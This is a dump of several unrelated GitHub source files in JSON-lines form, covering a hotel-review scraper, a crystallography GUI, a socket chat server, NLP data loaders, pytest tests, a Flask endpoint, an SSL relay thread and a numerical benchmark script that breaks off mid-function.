'contributions':contributions, \n 'date_of_stay':date_of_stay,'review_identical':review_identical, 'date_posted':date_posted }\n df = []\n for i in range(len(data['comments'])):\n df.append({k:v[i] for k,v in data.items()})\n data=pd.DataFrame(columns=['comments','rated','locations','contributions','date_of_stay','review_identical','date_posted'])\n for i in range(len(df)):\n data = data.append(pd.DataFrame(df[i]), ignore_index = True)\n \n return data\n\n\n# In[31]:\n\n\nabc = hotel_comment_scraper(URL = 'https://www.tripadvisor.com/Hotel_Review-g293932-d23804505-Reviews-Dave_Hotel_Yerevan-Yerevan.html')\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"grigdav/ReputationManagement_data_collection","sub_path":"Trip advisor scraping hotels.py","file_name":"Trip advisor scraping hotels.py","file_ext":"py","file_size_in_byte":7515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"13114500271","text":"import tkinter as tk\nimport math as math\nfrom tkinter import ttk\nfrom support import *\nfrom exit_button import create_exit_button\nfrom discus_convert import *\nfrom discus_rad_menu import discus_rad_menu\nfrom lib_discus_suite import *\n\n\nclass SINGLE_FOUR_FR(tk.Frame):\n def __init__(self, parent):\n tk.Frame.__init__ ( self, parent )\n self.config(borderwidth=2, relief=tk.RAISED, background=COLORS.fr_read)\n self.grid(row=2, column=0, columnspan=8, sticky='EW')\n#\n# Get Element symbols and characteristic wavelength from DISCUS\n nwave, self.symbols, self.wavelengths = get_wave()\n#\n# Get Fourier settings from DISCUS\n corners, increment, radiation, bElement, wvle, ener, adp, ano, \\\n percent, lot_type, lot_num, lot_dim, lot_per \\\n = suite.discus_get_fourier()\n for i in range(4):\n for j in range(3):\n corners[i,j] = round_rbn(corners[i,j],5)\n wvle = round_rbn(wvle,5)\n ener = round_rbn(ener,5)\n#\n# Determine if an element was given for its characteristic radiation\n Element = bElement.decode()\n ElementNumber = -1\n for i in range(nwave):\n if Element == self.symbols[i]:\n ElementNumber = i\n break\n\n self.ll_h = tk.StringVar()\n self.ll_k = tk.StringVar()\n self.ll_l = tk.StringVar()\n self.lr_h = tk.StringVar()\n self.lr_k = tk.StringVar()\n self.lr_l = tk.StringVar()\n self.ul_h = tk.StringVar()\n self.ul_k = tk.StringVar()\n self.ul_l = tk.StringVar()\n self.tl_h = tk.StringVar()\n self.tl_k = tk.StringVar()\n self.tl_l = tk.StringVar()\n self.ll_h.set(str(corners[0,0]))\n self.ll_k.set(str(corners[0,1]))\n self.ll_l.set(str(corners[0,2]))\n self.lr_h.set(str(corners[1,0]))\n self.lr_k.set(str(corners[1,1]))\n self.lr_l.set(str(corners[1,2]))\n self.ul_h.set(str(corners[2,0]))\n self.ul_k.set(str(corners[2,1]))\n self.ul_l.set(str(corners[2,2]))\n self.tl_h.set(str(corners[3,0]))\n self.tl_k.set(str(corners[3,1]))\n self.tl_l.set(str(corners[3,2]))\n self.caption=ttk.Label(self, text='Single crystal Fourier calculations')\n self.label_h = ttk.Label(self, text='H', anchor='center')\n self.label_k = ttk.Label(self, text='K', anchor='center')\n self.label_l = ttk.Label(self, text='L', anchor='center')\n self.label_ll = ttk.Label(self, text='Lower left')\n self.label_lr = ttk.Label(self, text='Lower right')\n self.label_ul = ttk.Label(self, text='Upper left')\n self.label_tl = ttk.Label(self, text='Top left')\n self.entry_ll_h = ttk.Entry(self, textvariable=self.ll_h, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.entry_ll_k = ttk.Entry(self, textvariable=self.ll_k, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.entry_ll_l = ttk.Entry(self, textvariable=self.ll_l, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.entry_lr_h = ttk.Entry(self, textvariable=self.lr_h, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.entry_lr_k = ttk.Entry(self, textvariable=self.lr_k, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.entry_lr_l = ttk.Entry(self, textvariable=self.lr_l, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.entry_ul_h = ttk.Entry(self, textvariable=self.ul_h, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.entry_ul_k = ttk.Entry(self, textvariable=self.ul_k, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.entry_ul_l = ttk.Entry(self, textvariable=self.ul_l, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.entry_tl_h = ttk.Entry(self, textvariable=self.tl_h, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.entry_tl_k = ttk.Entry(self, textvariable=self.tl_k, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.entry_tl_l = ttk.Entry(self, textvariable=self.tl_l, width=8, \n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore\n )\n #\n self.label_np = ttk.Label(self, text='Points along axis:')\n self.label_np_a = ttk.Label(self, text='Abscissa')\n self.label_np_o = ttk.Label(self, text='Ordinate')\n self.label_np_t = ttk.Label(self, text='Top axis')\n self.np_aa = tk.StringVar()\n self.np_oo = tk.StringVar()\n self.np_tt = tk.StringVar()\n self.np_aa.set(str(increment[0]))\n self.np_oo.set(str(increment[1]))\n self.np_tt.set(str(increment[2]))\n self.np_a = tk.Spinbox(self, from_=1, to=1001,width=8,\n justify='right', textvariable=self.np_aa,\n background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.np_o = tk.Spinbox(self, from_=1, to=1001,width=8,\n justify='right', textvariable=self.np_oo,\n background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.np_t = tk.Spinbox(self, from_=1, to=1001,width=8,\n justify='right', textvariable=self.np_tt,\n background=COLORS.en_back, foreground=COLORS.en_fore\n )\n #\n discus_rad_menu(self, nwave, radiation, wvle, ener, ElementNumber, adp, ano, 1, 4)\n #\n #\n self.Aver =tk.StringVar()\n self.Aver.set(percent)\n self.LabelAver =ttk.Label(self, \\\n text='Subtract scattering by average structure sampled at')\n self.EntryAver = ttk.Entry(self, textvariable=self.Aver, width=8,\n justify='right', background=COLORS.en_back, foreground=COLORS.en_fore)\n self.LabelAverPer =ttk.Label(self, text='%')\n #\n #\n self.lot_use = tk.IntVar()\n if lot_type == 0:\n self.lot_use.set(0)\n else :\n self.lot_use.set(1)\n self.label_lot = ttk.Label(self, text='Lots:')\n self.check_lot = ttk.Checkbutton(self, text='Use', variable=self.lot_use)\n self.check_lot.bind('', self.lot_event)\n #\n self.label_lotshape =ttk.Label(self, text='Lot Shape:')\n self.lot_shape = tk.Listbox(self, height=2, width=10, selectbackground=COLORS.en_back,\n selectforeground=COLORS.en_fore, selectmode=tk.SINGLE\n )\n self.lot_shape.configure(exportselection=False)\n self.lot_shape.insert(1, 'Box' )\n self.lot_shape.insert(2, 'Ellipsoid')\n if lot_type == 1 or lot_type==0 :\n self.lot_shape.selection_set(0)\n elif lot_type == 2:\n self.lot_shape.selection_set(1)\n #\n self.label_lotnum =ttk.Label(self, text='Lot Number:')\n self.lotnn = tk.StringVar()\n self.lotnn.set(str(lot_num))\n self.lotn = tk.Spinbox(self, from_=1, to=1001, width=6, \n justify='right', textvariable=self.lotnn,\n background=COLORS.en_back, foreground=COLORS.en_fore\n )\n #\n self.label_lotdimx =ttk.Label(self, text='Lot Size X:')\n self.label_lotdimy =ttk.Label(self, text='Lot Size Y:')\n self.label_lotdimz =ttk.Label(self, text='Lot Size Z:')\n self.lotxx = tk.StringVar()\n self.lotxx.set(str(lot_dim[0]))\n self.lotyy = tk.StringVar()\n self.lotyy.set(str(lot_dim[1]))\n self.lotzz = tk.StringVar()\n self.lotzz.set(str(lot_dim[2]))\n self.lotx = tk.Spinbox(self, from_=1, to=1001, width=6, \n justify='right', textvariable=self.lotxx,\n background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.loty = tk.Spinbox(self, from_=1, to=1001, width=6, \n justify='right', textvariable=self.lotyy,\n background=COLORS.en_back, foreground=COLORS.en_fore\n )\n self.lotz = tk.Spinbox(self, from_=1, to=1001, width=6, \n justify='right', textvariable=self.lotzz,\n background=COLORS.en_back, foreground=COLORS.en_fore\n )\n #\n self.label_lot_per = ttk.Label(self, text='Lots:')\n self.lot_per = tk.IntVar()\n if lot_per == 0:\n self.lot_per.set(0)\n else :\n self.lot_per.set(1)\n self.check_lot_per = tk.Checkbutton(self, text='Periodic', variable=self.lot_per)\n self.lot_menu(self.lot_use.get())\n #\n #\n self.acc = ttk.Button(self, text='Run', \n command=lambda: self.calc_fourier(parent, \n corners, increment, radiation, wvle, ener, adp, ano, percent, \n lot_type, lot_num, lot_dim, lot_per ))\n #\n #\n self.show= ttk.Button(self, text='Show', \n command=lambda: self.show_fourier(parent, \n corners, increment, radiation, wvle, ener, adp, ano, percent, \n lot_type, lot_num, lot_dim, lot_per ))\n #\n #\n create_exit_button(self, 'discus', 11, 8, self.exit_command,\n (parent, corners, increment, radiation, wvle, ener, adp, ano,\n percent, lot_type, lot_num, lot_dim, lot_per )\n )\n #\n #\n self.CExplain = tk.Canvas(self, bg=COLORS.fr_read, height=200, width=400)\n self.CExplain.create_text( 20, 20, text='Calculates an arbitrary line, ', anchor=tk.W)\n self.CExplain.create_text( 20, 35, text='plane or voxel in reciprocal ', anchor=tk.W)\n self.CExplain.create_text( 20, 50, text='space. The corners are the ', anchor=tk.W)\n self.CExplain.create_text( 20, 65, text='lower left, lower right...', anchor=tk.W)\n self.CExplain.create_text( 20, 80, text='Points include the corners as ', anchor=tk.W)\n self.CExplain.create_text( 20, 95, text='shown in the schematic drawing.', anchor=tk.W)\n self.CExplain.create_line(400, 120, 600,160, width=4)\n self.CExplain.create_line(400, 120, 400, 20, width=4)\n self.CExplain.create_line(400, 120, 500, 60, width=4)\n self.CExplain.create_oval(400-5, 120-5, 400+5, 120+5, fill='black')\n self.CExplain.create_oval(467-5, 133-5, 467+5, 133+5, fill='black')\n self.CExplain.create_oval(533-5, 147-5, 533+5, 147+5, fill='black')\n self.CExplain.create_oval(600-5, 160-5, 600+5, 160+5, fill='black')\n self.CExplain.create_oval(400-5, 70-5, 400+5, 70+5, fill='black')\n self.CExplain.create_oval(400-5, 20-5, 400+5, 20+5, fill='black')\n self.CExplain.create_oval(500-5, 60-5, 500+5, 60+5, fill='black')\n self.CExplain.create_text(390, 120, text='Lower left', anchor=tk.E )\n self.CExplain.create_text(600, 180, text='Lower right', anchor=tk.CENTER)\n self.CExplain.create_text(390, 20, text='Upper left', anchor=tk.E )\n self.CExplain.create_text(510, 60, text='Top left', anchor=tk.W)\n self.CExplain.create_text(500, 160, text='Points along abscissa = 4', anchor=tk.E)\n self.CExplain.create_text(390, 70, text='Points along ordinate = 3', anchor=tk.E)\n #\n\n## # If an Element name was given, make this active\n## if ElementNumber > -1:\n## self.ele.configure(state='normal')\n## self.entry_wvle.configure(state='disabled')\n## self.entry_ener.configure(state='disabled')\n## self.rad_type.set(2)\n## else:\n## self.ele.configure(state='disabled')\n## self.entry_wvle.configure(state='normal')\n## self.entry_ener.configure(state='disabled')\n## self.rad_type.set(0)\n\n self.caption.grid( row=0, column=0, columnspan=8, pady=(10, 10))\n self.label_h.grid( row=1, column=1, sticky='EW')\n self.label_k.grid( row=1, column=2, sticky='EW')\n self.label_l.grid( row=1, column=3, sticky='EW')\n self.label_ll.grid( row=2, column=0, sticky='EW')\n self.label_lr.grid( row=3, column=0, sticky='EW')\n self.label_ul.grid( row=4, column=0, sticky='EW')\n self.label_tl.grid( row=5, column=0, sticky='EW')\n self.entry_ll_h.grid(row=2, column=1, sticky='EW')\n self.entry_ll_k.grid(row=2, column=2, sticky='EW')\n self.entry_ll_l.grid(row=2, column=3, sticky='EW')\n self.entry_lr_h.grid(row=3, column=1, sticky='EW')\n self.entry_lr_k.grid(row=3, column=2, sticky='EW')\n self.entry_lr_l.grid(row=3, column=3, sticky='EW')\n self.entry_ul_h.grid(row=4, column=1, sticky='EW')\n self.entry_ul_k.grid(row=4, column=2, sticky='EW')\n self.entry_ul_l.grid(row=4, column=3, sticky='EW')\n self.entry_tl_h.grid(row=5, column=1, sticky='EW')\n self.entry_tl_k.grid(row=5, column=2, sticky='EW')\n self.entry_tl_l.grid(row=5, column=3, sticky='EW')\n self.label_np.grid( row=6, column=0, pady=(5, 0), columnspan=2, sticky='EW')\n self.label_np_a.grid(row=7, column=0, sticky='EW')\n self.label_np_o.grid(row=8, column=0, sticky='EW')\n self.label_np_t.grid(row=9, column=0, sticky='EW')\n self.np_a.grid( row=7, column=1, columnspan=1, sticky='EW')\n self.np_o.grid( row=8, column=1, columnspan=1, sticky='EW')\n self.np_t.grid( row=9, column=1, columnspan=1, sticky='EW')\n #\n self.LabelAver.grid( row=6, column=3, columnspan=7, sticky='EW')\n self.EntryAver.grid( row=6, column=7, sticky='EW')\n self.LabelAverPer.grid( row=6, column=8, sticky='W')\n self.label_lot.grid( row=7, column=4, sticky='EW')\n self.check_lot.grid( row=7, column=5, sticky='EW')\n self.label_lotshape.grid(row= 9, column=3, sticky='EW')\n self.lot_shape.grid( row= 9, column=4, rowspan=2, sticky='EW')\n self.label_lotnum.grid( row=11, column=3, sticky='EW')\n self.lotn.grid( row=11, column=4, sticky='EW')\n self.label_lotdimx.grid( row= 9, column=5, sticky='EW')\n self.label_lotdimy.grid( row=10, column=5, sticky='EW')\n self.label_lotdimz.grid( row=11, column=5, sticky='EW')\n self.lotx.grid( row=9, column=6, sticky='EW')\n self.loty.grid( row=10, column=6, sticky='EW')\n self.lotz.grid( row=11, column=6, sticky='EW')\n self.label_lot_per.grid( row=8, column=4, sticky='EW')\n self.check_lot_per.grid( row=8, column=5, sticky='EW')\n self.show.grid( row=9, column=8)\n self.acc.grid( row=10, column=8)\n self.CExplain.grid( row=12, column=0, columnspan=9, sticky='EW')\n #\n line = 'fourier'\n suite.suite_learn(line)\n\n def lot_event(self, event):\n # Inverts the current setting, apparently the Chekbutton bind \n # Is executed BEFORE the button is inverted !?!?\n if self.lot_use.get()==1:\n choice = 0\n else:\n choice = 1\n self.lot_menu(choice)\n\n def lot_menu(self, choice):\n if choice ==1:\n self.label_lotshape.configure(foreground=COLORS.nor_fore)\n self.label_lotnum.configure(foreground=COLORS.nor_fore)\n self.label_lotdimx.configure(foreground=COLORS.nor_fore)\n self.label_lotdimy.configure(foreground=COLORS.nor_fore)\n self.label_lotdimz.configure(foreground=COLORS.nor_fore)\n self.label_lot_per.configure(foreground=COLORS.nor_fore)\n self.lot_shape.configure(state='normal')\n self.lotn.configure(state='normal')\n self.lotx.configure(state='normal')\n self.loty.configure(state='normal')\n self.lotz.configure(state='normal')\n self.check_lot_per.configure(state='normal')\n else:\n self.label_lotshape.configure(foreground=COLORS.dis_fore)\n self.label_lotnum.configure(foreground=COLORS.dis_fore)\n self.label_lotdimx.configure(foreground=COLORS.dis_fore)\n self.label_lotdimy.configure(foreground=COLORS.dis_fore)\n self.label_lotdimz.configure(foreground=COLORS.dis_fore)\n self.label_lot_per.configure(foreground=COLORS.dis_fore)\n self.lot_shape.configure(state='disabled')\n self.lotn.configure(state='disabled')\n self.lotx.configure(state='disabled')\n self.loty.configure(state='disabled')\n self.lotz.configure(state='disabled')\n self.check_lot_per.configure(state='disabled')\n\n\n def show_fourier(self, parent, \\\n corners, increment, radiation, wvle, ener, adp, ano,\n percent, lot_type, lot_num, lot_dim, lot_per\n ):\n\n self.send_fourier(corners, increment, radiation, wvle, ener, adp, ano,\n percent, lot_type, lot_num, lot_dim, lot_per \n )\n line= ('show')\n suite.discus_calc_fourier(line)\n\n def calc_fourier(self, parent, \n corners, increment, radiation, wvle, ener, adp, ano, \n percent, lot_type, lot_num, lot_dim, lot_per \n ):\n\n self.send_fourier(corners, increment, radiation, wvle, ener, adp, ano, \n percent, lot_type, lot_num, lot_dim, lot_per \n )\n line= ('run')\n suite.discus_calc_fourier(line)\n line = 'exit'\n suite.discus_calc_fourier(line)\n parent.b_fourmenu.menu.entryconfig(6, state='normal')\n # Close menu\n self.destroy()\n\n def send_fourier(self, \n corners, increment, radiation, wvle, ener, adp, ano, percent, lot_type, \\\n lot_num, lot_dim, lot_per \n ):\n line = ('ll' + ' ' + str(self.entry_ll_h.get()) \n + ',' + str(self.entry_ll_k.get())\n + ',' + str(self.entry_ll_l.get())\n )\n suite.discus_calc_fourier(line)\n line = ('lr' + ' ' + str(self.entry_lr_h.get()) \n + ',' + str(self.entry_lr_k.get())\n + ',' + str(self.entry_lr_l.get())\n )\n suite.discus_calc_fourier(line)\n line = ('ul' + ' ' + str(self.entry_ul_h.get()) \n + ',' + str(self.entry_ul_k.get())\n + ',' + str(self.entry_ul_l.get())\n )\n suite.discus_calc_fourier(line)\n line = ('na' + ' ' + str(self.np_a.get()))\n suite.discus_calc_fourier(line)\n line = ('no' + ' ' + str(self.np_o.get()))\n suite.discus_calc_fourier(line)\n line = ('nt' + ' ' + str(self.np_t.get()))\n suite.discus_calc_fourier(line)\n#\n if is_empty(self.rad.curselection()):\n radiation = 0\n else:\n radiation = int(self.rad.curselection()[0])\n if radiation == 0:\n line = 'xray'\n elif radiation == 1:\n line = 'neutron'\n elif radiation == 2:\n line = 'electron'\n else :\n line = 'xray'\n suite.discus_calc_fourier(line)\n if self.rad_type.get() == 0:\n line = ('wvle' + ' ' + str(self.entry_wvle.get()))\n elif self.rad_type.get() == 1:\n line = ('energy' + ' ' + str(self.entry_ener.get()))\n elif self.rad_type.get() == 2:\n line = ('wvle ' + str(self.symbols[int(self.ele.curselection()[0])]))\n suite.discus_calc_fourier(line)\n if self.adp.get() == 1:\n line = ('temp use')\n elif self.adp.get() == 0:\n line = ('temp ignore')\n suite.discus_calc_fourier(line)\n if self.ano.get() == 1:\n line = ('disp anom')\n elif self.ano.get() == 0:\n line = ('disp off')\n suite.discus_calc_fourier(line)\n line = 'set aver, ' + str(self.Aver.get())\n suite.discus_calc_fourier(line)\n if self.lot_use.get() == 0:\n line = 'lots OFF'\n else:\n if is_empty(self.lot_shape.curselection()):\n shape = 0\n else:\n shape = int(self.lot_shape.curselection()[0])\n if self.lot_per.get()== 1:\n period = 'yes'\n else:\n period = 'no'\n if shape==0:\n line = 'lots ' + 'box,' + str(self.lotx.get()) + ',' \\\n + str(self.loty.get()) + ',' \\\n + str(self.lotz.get()) + ',' \\\n + str(self.lotn.get()) + ',' + period\n else:\n line = 'lots ' + 'box,' + str(self.lotx.get()) + ',' \\\n + str(self.loty.get()) + ',' \\\n + str(self.lotz.get()) + ',' \\\n + str(self.lotn.get()) + ',' + period\n suite.discus_calc_fourier(line)\n\n def exit_command(self, parent, \\\n corners, increment, radiation, wvle, ener, adp, ano, \\\n percent, lot_type, lot_num, lot_dim, lot_per \n ):\n self.send_fourier(\\\n corners, increment, radiation, wvle, ener, adp, ano, \n percent, lot_type, lot_num, lot_dim, lot_per \n )\n line = 'exit'\n suite.discus_calc_fourier(line)\n#\n","repo_name":"rneder/DiffuseGUI","sub_path":"CODE/discus_fourier.py","file_name":"discus_fourier.py","file_ext":"py","file_size_in_byte":21976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"38012981559","text":"import threading\nimport socket\n\ns= socket.socket()\nip=\"192.168.43.140\"\nport=1234\ns.bind((ip,port))\ns.listen()\nc,addr=s.accept()\nsender_ip=str(addr[0])\n\nprint(\"/n/t/t/t/t/tWELCOME\\n\")\nprint(\"connected successfully...\")\n\ns.listen()\ndef send():\n while True:\n data=input(\"\\n\\t\\t\\t\\t\\t\\t<<<: \")\n data=data.encode()\n c.send(data)\n\n\ndef recv():\n while True:\n data=c.recv(1024)\n data=data.decode()\n print(\"\\n\\t\"+ip+\":>>> \"+data)\n\nreceive_thread=threading.Thread(target=recv)\nsend_thread=threading.Thread(target=send)\n\nreceive_thread.start()\nsend_thread.start()\ns.close()\t\n","repo_name":"kush95300/KUKU-Messenger-App","sub_path":"KUKU_chat_server.py","file_name":"KUKU_chat_server.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"31161158898","text":"import pandas as pd\nimport json\nfrom transformers.tokenization_bert import BertTokenizer\n\n\ndef read_data(file_path,mode=0):\n if mode==0:\n df = pd.read_csv(file_path,sep=\"\\t\",header=None,names=['id','content',\"type\",\"entity\"])\n else:\n df = pd.read_csv(file_path,sep=\"\\t\",header=None,names=[\"id\",\"content\"])\n return df\n\n\ndef get_ner_data_by_df(file_path,mode):\n data = []\n df = read_data(file_path,mode)\n if mode!=0:\n for row in df.iterrows():\n example = {}\n example[\"content\"] = row[1]\n example[\"entity_list\"] = []\n data.append(example)\n else:\n df = df[df.type.apply(lambda x: type(x)!=float)] ## erase examples without type and entity\n unique_sentences = df.content.unique()\n for sentence in unique_sentences:\n example = {}\n entity_list = _get_entity_list(df,sentence)\n example[\"content\"] = sentence\n example['entity_list'] = entity_list\n data.append(example)\n return data\n\n\n\ndef get_ner_data_by_txt(file_path,mode):\n data_dict = {}\n with open(file_path,'r',encoding='utf-8') as file:\n for line in file.readlines():\n row = line.split(\"\\t\")\n if mode==0 and len(row)==4:\n id = row[0]\n content = row[1]\n type = row[2]\n entity = row[3].strip()\n if type!=\"NaN\":\n if content not in data_dict:\n data_dict[content] = [entity]\n else :\n data_dict[content]+=[entity]\n else:\n continue\n elif mode==1 and len(row)==4:\n id = row[0]\n content = row[1].strip()\n data_dict[id] = content\n else:\n print(\"reading error: {}\".format(line))\n if mode==0:\n data = [{\"content\":k,\"entity_list\":v} for k , v in data_dict.items()]\n if mode==1:\n data = [{\"uid\":k, \"content\":v,\"entity_list\": []} for k , v in data_dict.items()]\n return data\n\n\n\ndef get_cls_data_by_txt(file_path,mode):\n data = []\n if mode == 0:\n train_df = pd.read_csv(file_path, sep='\\t', header=None,\n names=['id', 'content', 'type', 'entity'])\n neg_df = train_df[train_df.type.isna()]\n pos_df = train_df[~train_df.type.isna()]\n new_train_df = pos_df.groupby(by=['content']).type.aggregate(set).reset_index()\n for idx, row in new_train_df.iterrows():\n uid = idx\n content = row['content']\n types = list(row['type'])\n data.append((uid, content, types))\n # for idx, row in neg_df.iterrows():\n # # 加上负例\n # uid = idx\n # content = row['content']\n # types = None\n # data.append((uid, content, types))\n # continue\n elif mode==1:\n test_df = pd.read_csv(file_path,sep = \"\\t\",header =None,names = ['uid','content'])\n print(test_df.shape)\n for _, row in test_df.iterrows():\n na_check = ~row.isna()\n id = row[0]\n content = row[1] if na_check[1] else \"\"\n type = None\n data.append((id,content,type))\n return data\n\n\ndef _get_entity_list(df,content):\n entity_list = list(df[df.content==content].entity)\n return entity_list\n\nclass MyBertTokenizer():\n\n @classmethod\n def from_pretrained(cls, path,*args,**kwargs):\n obj = cls()\n obj.bert_tokenizer = BertTokenizer.from_pretrained(path,*args,**kwargs)\n return obj\n\n def tokenize(self,sentence):\n tokens = []\n for c in sentence:\n if c in self.bert_tokenizer.vocab:\n tokens.append(c)\n else:\n tokens.append(\"[UNK]\")\n return tokens\n\n def convert_tokens_to_ids(self,tokens):\n return self.bert_tokenizer.convert_tokens_to_ids(tokens)\n\n def convert_ids_to_tokens(self,ids):\n return self.bert_tokenizer.convert_ids_to_tokens(ids)\n\n\n\n\n\n","repo_name":"South7X/CCKS2020","sub_path":"CCKS_multi-label/data_utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4097,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"42492504052","text":"import pytest\n\nimport os\nimport news_scraping.output as store\n\n\n@pytest.fixture\ndef valid_output_names():\n \"\"\"valid output names\"\"\"\n return ['some_name', '_', 'some_simple_title',\n 'max_len_title_available_is_50_chars_so_i_need_more']\n\n\n@pytest.fixture\ndef output_names():\n \"\"\"valid output names. list of tuples observed name, expected after transformation\"\"\"\n return [('some_symbols_fi:l*ep\"a?t>h|<', 'some_symbols_filepath'),\n ('some spaces ', 'some_spaces'),\n ('max_len_title_available_is_50_chars_so_i_need_more_a',\n 'max_len_title_available_is_50_chars_so_i_need_more')]\n\n\n@pytest.fixture\ndef valid_output_dirs():\n \"\"\"Get valid output dir names\"\"\"\n valid_dirs = [os.path.dirname(os.path.realpath(__file__))]\n return valid_dirs\n\n\n@pytest.fixture\ndef valid_identifiers():\n \"\"\"Get valid identifiers for output path\"\"\"\n return [1, \"1\"]\n\n\ndef test_format_output_name_valid(valid_output_dirs, valid_identifiers, valid_output_names):\n \"\"\"Test func format output name when it receives valid path\"\"\"\n for valid_dir in valid_output_dirs:\n for valid_identifier in valid_identifiers:\n for valid_name in valid_output_names:\n # Since it is a valid output path, it should return the same as passed\n expected_path = os.path.join(valid_dir, f\"{valid_identifier}_{valid_name}\")\n observed_path = store.format_output_name(valid_dir, valid_name, valid_identifier)\n assert expected_path == observed_path\n\n\ndef test_format_output_name_invalid_output_name(valid_output_dirs, valid_identifiers, output_names):\n \"\"\"Test function when it receives invalid output_names\"\"\"\n for valid_dir in valid_output_dirs:\n for valid_identifier in valid_identifiers:\n for invalid_name, valid_name in output_names:\n # Since it is a valid output path, it should return the same as passed\n expected_path = os.path.join(valid_dir, f\"{valid_identifier}_{valid_name}\")\n observed_path = store.format_output_name(valid_dir, invalid_name, valid_identifier)\n assert expected_path == observed_path\n","repo_name":"AnomanderRK/newsscraping","sub_path":"tests/test_store.py","file_name":"test_store.py","file_ext":"py","file_size_in_byte":2190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"8756423329","text":"\n\nfrom flask import Blueprint, abort, jsonify\n\nfrom .. import models, utils\n\n\napi = Blueprint('api', __name__)\n\n\n@api.route('/filelist/')\ndef filelist(torrent_id):\n torrent = models.Torrent.query.filter_by(id=torrent_id).first()\n if torrent is None:\n return abort(404)\n files = []\n for file in torrent.files:\n files.append(dict(\n path=file.path,\n size=file.size,\n pretty_size=utils.pretty_size(file.size),\n ))\n return jsonify(\n id=torrent.id,\n files=files\n )\n","repo_name":"ipatrol/pynyaa","sub_path":"pynyaa/views/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"23700516530","text":"import socket\nimport logging\nfrom threading import Thread\nfrom time import sleep\n\nRETRY_THRESHOLD = 10 # Number of retry before closing a timed-out request\n\n\nclass SSLThread(Thread):\n def __init__(self, in_socket, out_socket, *args, **kwargs):\n self.in_socket = in_socket\n self.out_socket = out_socket\n self.out_socket.settimeout(2)\n super(*args, **kwargs)\n Thread.__init__(self)\n\n def run(self):\n retry_count = 0\n while True:\n try:\n data_in = self.out_socket.recv(512)\n retry_count = 0\n except socket.error as e:\n err = e.args[0]\n if err == 'timed out' and retry_count < RETRY_THRESHOLD:\n sleep(1)\n retry_count += 1\n continue\n else:\n logging.info(\"ssl timeout, closing ({})\".format(self))\n self.in_socket.close()\n self.out_socket.close()\n return\n except socket.error as e:\n return\n else:\n if len(data_in) == 0:\n logging.info(\"Connection terminated\")\n self.in_socket.close()\n self.out_socket.close()\n return\n else:\n try:\n self.in_socket.send(data_in)\n except OSError:\n logging.info(\"Connection terminated\")\n self.in_socket.close()\n self.out_socket.close()\n return\n","repo_name":"rkouere/ssh_secret","sub_path":"ssh_tunnel/proxy/ssl_thread.py","file_name":"ssl_thread.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"21930552941","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 12 11:17:06 2022\n\n@author: bennett\n\"\"\"\n\nimport numpy as np\nimport math as math\nimport scipy.integrate as integrate \n# from numba import njit, cfunc, jit\nimport matplotlib.pyplot as plt\nfrom timeit import default_timer as timer\nimport h5py\nfrom .benchmark_functions import F, F1, F_gaussian_source, uncollided_square_source, pyF, get_intervals\nfrom pathlib import Path\n\n# @cfunc(\"complex128(float64, float64)\")\n# @jit\n\n \ndef opts0(*args, **kwargs):\n return {'limit':1000000}\n \ndef opts1(*args, **kwargs):\n return {'limit':1000000}\n \ndef opts2(*args, **kwargs):\n return {'limit':1000000}\n\ndef do_ganapol(x, tfinal, x0):\n integral_1 = pyF(0.0, 0.0, tfinal, x)\n integral_2 = integrate.nquad(F1, [[0, math.pi]], args = (0.0, 0.0, x, tfinal, 0), opts = [opts0])[0]\n return integral_1 + integral_2\n\ndef do_square_ic(x, tfinal, x0):\n integral_1 = integrate.nquad(F, [[-x0, x0]], args = ([0.0, tfinal, x, 0]), opts = [opts0])[0]\n integral_2 = integrate.nquad(F1, [[0, math.pi], [-x0, x0]], args = (0.0, x, tfinal, 0), opts = [opts0, opts0, opts0])[0]\n return integral_1 + integral_2\n\ndef do_square_source(x, tfinal, x0):\n collided_solution = integrate.nquad(F1, [[0, math.pi], [-x0, x0], [0,tfinal]], args = (x, tfinal, 0), opts = [opts0, opts1, opts2])[0]\n uncollided_solution = uncollided_square_s2(x, tfinal, x0, tfinal)\n\n # intervals = get_intervals(x, tfinal, x0, tfinal)\n # a = intervals[0]\n # b = intervals[1]\n # c = intervals[2]\n # d = intervals[3]\n \n # if a == tfinal:\n # print(\"a = t\")\n # if b == tfinal:\n # print(\"b = t\")\n # if c == tfinal:\n # print(\"c = t\")\n # if d == 